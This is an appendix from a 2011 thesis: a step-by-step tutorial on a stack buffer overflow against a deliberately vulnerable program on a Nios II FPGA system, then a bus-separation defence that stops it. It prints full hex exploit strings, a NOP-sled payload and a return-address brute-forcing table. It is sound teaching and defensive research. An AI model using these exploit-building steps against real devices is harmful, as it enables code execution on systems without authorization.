74. ICS-CERT ADVISOR, http://www.us-cert.gov/control_systems/pdf/ICSA-11-161-

01.pdf, date accessed June 2011

75. http://en.wikipedia.org/wiki/Harvard_architecture, date accessed June 2011

76. Hennessy, J., Patterson, D. and Arpaci-Dusseau, A., : A

Quantitative Approach, 4th Edition, Appendix K, Morgan Kaufman.

66

APPENDIX A

Tutorial for Buffer Overflow Attack and Prevention in Embedded Systems Amjad Basha Sikiligiri July 2011

This chapter presents a step by step implementation procedure for stack based buffer overflow attacks. The steps involved are:

1. Confirm that the application is buffer overflow vulnerable

2. Find the effective buffer length

3. Find the approximate address of the buffer

4. Develop and inject the exploit string

This tutorial is based on version 10.1 of the Altera Quartus II, version 10.1 of the Altera Nios II

IDE and the Altera UP3 board. Some modifications to details may be needed for new versions or prototyping boards.

A.1 Nios II system

Chapter 17 of “Rapid Prototyping of Digital Systems” [73] describes the Nios II processor hardware design using Altera‟s SOPC builder. SOPC Builder is a GUI-based hardware design tool used to configure the Nios II processor core, bus and I/O interfaces.

The design files can be found in the companion DVD (folder name is CHAP17). These files are the starting point for this tutorial. Copy the CHAP17 folder from the DVD into your working directory (For example, C:\Demo).

67

Run the Quartus II(10.1 version) tool installed in your system. From the “File” menu, using

“Open Project” open rpds17.qpf located at C:\Demo\CHAP17\complete. Double click on the

“rpds17” entity in the “Project Navigator” pane. This will display the Nios II system schematic with Nios32 , up3_pll and up3_bus_mux design blocks. Double click on the Nios32 design block and this should pop out the SOPC builder GUI. A pop up message will ask to “Upgrade

Project File” but click on “Open in Classic”

The above step would open up the Nios II system in a GUI as shown in Figure A.1. The figure says that sram and lcd components are not installed. To install them, just move the up3_tristate_lcd and up3_tristate_sram folders located at C:\Demo\CHAP17 into

C:\Demo\CHAP17\complete. Now close and reopen the SOPC builder as done earlier to confirm that sram and lcd components are installed.

Figure A.1: Nios II system with all its components

68

Figure A.1 also shows that both the instruction and data bus are connected to the SDRAM,

Flash and SRAM memories through different master and slave ports. The attack steps mentioned in the beginning of this tutorial can be performed on this default Nios II system

(which you may have used in your other projects). This system does not provide system level protection from stack based “code injection” buffer overflow attacks.

In this tutorial we prevent successful buffer overflow attack by first designing a system with the

SRAM memory connected to the data bus alone and allocating function call stacks in this memory region. To obtain a Nios II system with SRAM memory connected to the data bus alone, disconnect the instruction bus from avalon_slave by left clicking the mouse over the interconnect. The resultant system is shown in Figure A.2.

Figure A.2: Nios II system with SRAM connected to data bus alone

69

To aid in debugging, we will add a debug feature called “Instruction Trace”. Click on the “cpu” module name to pop out another GUI window to configure Nios II CPU (Figure A.3). In this

GUI, click on “JTAG Debug Module”, select “Level 3” and click “Finish”.

Figure A.3: Nios II Instruction Trace debug feature

Click “Next >” and change the “Reset Address” and Exception Address” to “sdram/s1” memory modules. Generate this system by clicking on “Generate” button at the bottom of the current window as shown in Figure A.4. Make sure that the system is generated successfully.

Figure A.4: Nios II system generation 70

Close the SOPC builder and compile (Ctrl + L) the system using the Quartus II tool. Make sure that the system compilation is error free.

The compiled system (which is the same as the one in Figure A.2) is then used to program

Altera‟s Cyclone FPGA in the UP3 Educational kit. To achieve this, first connect the UP3 board to your PC using the ByteBlasterII cable. Then run the Nios II IDE(10.1 version) installed in your system or from Start->Altera->Nios II EDS 10.1 sp1->Legacy Nios II tools -> Nios II 10.1

IDE.

From the “Tools” tab in Nios II IDE, click on “Quartus II programmer”. In the “Quartus II programmer” GUI, choose “ByteBlaster II” from “Hardware Setup”. Then from the “File” menu open the file “rpds17_time_limited.sof” located at C:\Demo\CHAP17\complete. Click on the “Start” button to program the FPGA with the Nios II system we built (Figure A.3) earlier. Refer to Figure A.5 for FPGA programming directions.

Figure A.5: Programming the Cyclone FPGA

This completes the Nios II system design which can be resistant to “code injection attacks”, unlike the standard system.

71

A.2 Attack steps

Ideally, the attacker would be employing the following steps to target the system shown in

Figure A.1. By default, in the Nios II IDE, all the process memory regions (stack, heap, code etc) are allocated in SDRAM memory (which is connected to instruction bus and data bus in both Figures A.1 and A.2). Hence even the Figure A.2 system is vulnerable when the function call stack region is accessible to the instruction bus. For the sake of simplicity we will use the system in Figure A.2 to implement the “code injection” attack and then show how to prevent a successful “code injection” attack.

A.2.1 Approximate address of the buffer

Since the buffer is present in the function call stack region, approximate stack starting address serves as a good starting point. This is because, for a given processor and operating system, function call stacks start at approximately the same memory address for all programs.

Using the Nios II IDE, create a new “Nios II C/C++ application” from the “File” menu. As shown in Figure A.6, name the project “Initial_address”. Select nios32.ptf from

C:\Demo\CHAP17\complete for “SOPC Builder System PTF File”.

In the “Select Project Template” pane, click on the “Blank Project” template. Click “Next”.

Then click on “Select or create a system library” and “New System Library Project”. Name the system library “address_lib”, select MicroC/OS II as the type of RTOS as shown in Figure A.7 and click “Finish”.

72

Figure A.6: Nios II project creation

Figure A.7: MicroC/OS II system library creation 73

In the “Nios II C/C++ Projects” pane, right click on “Initial_address” and create a new source file with name “Initial_address.c”. Copy the code from the Figure 4.1 in to

Initial_address.c.and save.

To compile and download the “Initial_address.c”. program on to the Nios II system, right click on “Initial_address” in “Nios II C/C++ Projects” pane and select “Run As => Nios II

Hardware”. The program displays “0x81ab10” on the console as the stack address. This is the approximate address where buffer is located.

A.2.2 The vulnerable application

Similar to Section A.2.1, create another “Nios II C/C++ application” named

“Vulnerable_program” with the program code in Figure 4.2. Compile and download this program as described in section A.2.1. The output should be:

Processing called function....!! In main function executed assignment of x. The value of x is 1

Note that since the “critical_function” was never called, it was not executed.

A.2.3 Is the application buffer overflow vulnerable?

This can be verified by compiling the “Vulnerable_program” with a long string of input as an argument to the “process_input” function. The application malfunctions when a sufficiently long string is set as an argument to the “process_input” function, hence indicating that the application is vulnerable to buffer overflow. In reality the argument (i.e., the attacker input) can come in various forms [39], such as

74

User input:

o Typing into a web browser in case of webservers.

o Command line argument passing in case of workstations, etc.

o Program reading input from a file, as happened in the “Twilight Hack” exploit

(buffer overflow was due to the horse name saved in the file )

o Interactive programs which ask for user name or file name

Network connection: Most of the modern embedded systems are networked and hence

the network packets used to communicate are also a way to inject exploit code

Environment variables : programs that try to locate a file using environment variables

A.2.4 Effective buffer length

Similar to Section A.2.3, compile the “Vulnerable_program” by gradually increasing the length of the argument being passed to “process_input” until it malfuntcions. One such string is

„1234567890123456789012345678901234567890123456789012345678901234567890123456

78901234567890123456‟, of length 96 bytes. But the attacker also has to consider the null byte which gets appended at the end of each string. Hence the effective length is 96+1=97 bytes.

Also, C compilers allocate memory in multiples of the word size(4 bytes for Nios II), implying that the effective buffer length is 100 bytes.

A.2.5 Develop and inject the exploit string

The attack aims at dynamically changing the execution flow by executing the

“critical_function” (which should never be executed under normal conditions) with the help of stack based buffer overflow. Conventionally the attack involves spawning a new shell by

75

exploiting the buffer overflow in a privileged program [2, 4]. In either case, the exploit makes use of the fact that instructions can be executed from the stack region of the process memory.

Execution flow change is achieved by exploiting the argument being passed in the program to the “process_input” function. This argument is later copied into the called function‟s local buffer present in the stack memory region. Hence the program is buffer overflow vulnerable.

In order to change the execution flow and direct it to the “critical_function”, we need to know the address of “critical_function” in the memory. Finding the address of “critical_function” is analogous to finding address of system calls. Generally this is accomplished using gdb/GNU debugger, Ltrace or similar tools [5, 72]. Also the fact that libc functions maintain their address in memory until recompiled [72] makes this step easier.

In this tutorial, we use the Nios II command shell to find the address of “critical_function”. To accomplish this, first we need to generate the executable link format/.elf file of the vulnerable program. This can be done by right clicking on the “Vulnerable_program” in the “Nios II

C/C++ Projects” pane and selecting “Build Project”.

Now run “Nios II Command Shell” (from Start->Altera->Nios II EDS 10.1 sp1-> Nios II

Command Shell). In the shell prompt, enter “cd

/cygdrive/C/Demo/CHAP17/complete/software/Vulnerable_program/Debug/”. This folder will have the “Vulnerable_program.elf” file. Enter “nios2-elf-objdump -dS Vulnerable_program.elf

> assembly.txt”. This command will convert the .elf file into assembly level instructions along with the program code address space. This file indicates that the “critical_function” is present at the memory address “0x0080030c” Hence we can now use the following three instructions to make the Nios II processor jump to “critical_function” (assuming r5 is initially zero).

76

Assembly instructions Binary equivalent xorhi r5, r5, 0x0080 0x4940203c addi r5, r5, 0x030c 0x2940c304 callr r5 0x283ee83a

The attacker first stores the value 0x0080030c in some register, say r5 and later use the „callr‟ assembly instruction which transfers execution to the address contained in „r5‟. Therefore the attacker has exploit code of length 12 bytes (3 instructions x 4 bytes per instruction) and the new return address requires 4 bytes. But the effective buffer length is 100 bytes. The remaining

84(=100-12-4) bytes can be filled with NOP instructions for NOP Sled. This is illustrated below:

Using the NOP Sled technique, it‟s enough for the attacker to point the new return address anywhere into this NOP region. The processor will then slide to the exploit code. In this case 21

(=84/4) NOP instructions can be accommodated. The total 100 bytes of the exploit string (i.e., the argument to the “process_input” function ) is as shown next

77

To supply a string in hexadecimal format as an input to C programs, we need to use an „\x‟ character for each byte. For example, since the Nios II architecture is little endian [1], the equivalent input string for the „xor r5, r5, r5‟ instruction is „\x3a\xf0\x4a\x29‟. Hence the attacker input (i.e., exploit string) in this case is:

\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a \xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0 \x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a \x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29 \x34\x20\x40\x01\x04\xc3\x40\x29\x3a\xe8\x3e\x28\x10\xab\x81\x00

Give the above string as an input to the “process_input” function, compile and download the

“Vulnerable_program” as done in section A.2.1. The output of the program would be

78

Processing called function....!!

The above output indicates that the attack is not successful. This is because the guessed new return address “0x0081ab10” does not point to the NOP region. Since the exploit string has 21

NOPs, the attacker can increase (attempts 2, 4, 6, 8 and 10 in the Table below) or decrease

(attempts 3, 5, 7 and 9 in the Table below) the address „0x0081ab10‟ by 84(=21x4) bytes and test it on the program as an estimated return address.

Attempt # Estimated return address Status of the exploit

1 0x0081ab10 Fail

2 0x0081ab64 Fail

3 0x0081aabc Fail

4 0x0081abb8 Fail

5 0x0081aa68 Fail

6 0x0081ac0c Fail

7 0x0081aa14 Fail

8 0x0081ac60 Fail

9 0x0081a9c0 Fail

10 0x0081acb4 Success

The successful exploit string should have “0x0081acb4” as the new return address. The binary equivalent of the exploit string in this case is:

79

\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a \xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0 \x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a \x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29 \x34\x20\x40\x01\x04\xc3\x40\x29\x3a\xe8\x3e\x28\xb4\xac\x81\x00

Give the above string as an argument to “process_input” and compile the application. The output in this case will be:

Processing called function....!! Hacked: The flow has been successfully changed

To understand what really happened, we can use the “Debug” feature in the Nios II IDE. To debug the “Vulnerable_program”, right click on the “Vulnerable_program” in the “Nios II

C/C++ Projects” pane and select “Debug As => Nios II Hardware”. This would open up the

IDE in “Debug” view as shown in Figure A.8

80

Figure A.8: Nios II IDE Debug view

Now click on Vulnerable_program.c tab and insert a breakpoint (by double clicking on the left border of the pane) at the “return” statement in this file. Run the program by clicking the button in the top left of the IDE as shown with red arrow in Figure A.9:

Figure A.9: Run the program in Debug view 81

The previous step runs the program until the “return” statement. Now click on the “Instruction

Stepping Mode” button present in the top of the IDE as shown with red arrow in Figure A.10:

Figure A.10: Instruction Stepping Mode

Instruction stepping mode shows the binary equivalent of the Vulnerable_program.c and also provides an option to execute binary instructions one at a time using the “Step Into” mode. At this moment the processor‟s program counter (PC) is at the function epilogue (refer to Chapter 2 for details) of the “process_input” function. The exact value of the PC and the stack pointer/SP can be seen in the “Registers” pane in the top right as shown in Figure A.11.

Figure A.11: Nios II register set

82

Click the “Step Into” button(Figure A.12, red arrow) four times to execute “ret” binary instruction. This leads the PC to the exploit string instructions (supplied as an argument to

“process_input” in the beginning of this section)

Figure A.12: Instruction step into mode

Now observe the register set to notice that the PC and SP are very close. This is because the PC is now pointing to the stack region which has the exploit string. The reason is that the argument to the “process_input” function has overflown into the return address/ra part of the stack (refer to chapter 2 for details). But the argument was carefully crafted to point the return address back into the stack buffer region (refer to chapter 4 for details). At this moment the PC is ready to execute a series of “XOR r5, r5, r5” instructions which are part of NOP sled. Continue “Step

Into” until the PC reaches “Callr r5” instruction. This leads the PC to the “critical_function” which was not supposed to be executed normally.

Now click “Run” as shown in Figure A.9 and notice the console for the output caused due to the stack based buffer overflow.

A.3 Prevention

As seen in section A.2, the stack based buffer overflow attacks execute instructions in the function call stack region of the process memory. This can be prevented by not allowing the PC to fetch instructions from the function call stack region.

83

To do this, switch back to the “Nios II C/C++” view from the “Debug” (if required click the double arrows at the extreme top right corner). Right click the “Vulnerable_program” in the

“Nios II C/C++ Projects” pane and select “System Library Properties”. Notice that the stack, text and other regions of the program memory space are allocated in the sdram memory (Figure

A.13)

Figure A.13: Allocation of stack, text and other regions

The „Stack memory‟ listed in Figure A.13 indicates the task creating stacks [7] but not the function calling stacks. Function call stacks come under the category „read/write data memory‟ for the current system. Hence allocate the read/write data portion of the program to the SRAM using the dropdown menu in Figure A.13. Since the SRAM is connected to the data bus but not

84

to the instruction bus (section A.1), the PC will not be able to fetch instructions for the stack buffer.

As the attack is now effectively prevented, NOP sled technique cannot be applied to find the effective buffer address. For demonstration purpose the effective buffer address can be found from the register set (Figure A.11) and “Memory” (Figure A.14). First run the

“Vulnerable_program” in Debug view by using a break point at the “return” statement (as done in section A.4). At this point, from the Nios II register set, we see the value of SP to be

0x2038d0. In the “Memory” (Figure A.14) pane, add a monitor for 0x2038d0.by clicking on the

“+” sign. This would display the memory contents near this address. Upon careful observation it can be noticed that the exploit string of section A.4 starts at 0x2038d4(Figure A.15)

Figure A.14: Memory monitor addition

85

Figure A.15: Exploit string in the memory

Hence modify the return address (last four bytes) of section A.4 exploit string to obtain the following:

\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a \xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0 \x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a \x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29 \x34\x20\x40\x01\x04\xc3\x40\x29\x3a\xe8\x3e\x28\xd4\x38\x20\x00

Give the above string as an input to the “process_input” function and rerun the

“Vulnerable_program” in Debug view by using a break point at “return” statement. Switch to

“Instruction Stepping Mode” (Figure A.10, red arrow) and “Step Into” (Figure A.12, red arrow) four times to execute “ret” binary instruction. Select the “Trace” pane (near “Registers” pane,

Figure A.16) and continue to “Step Into”. The “Trace” pane will now be displaying messages such as “ERROR: address 2038d4 not in Memory” (Figure A.16). This implies that the attack is unsuccessful.

86

Figure A.16: Instruction trace showing error in execution

87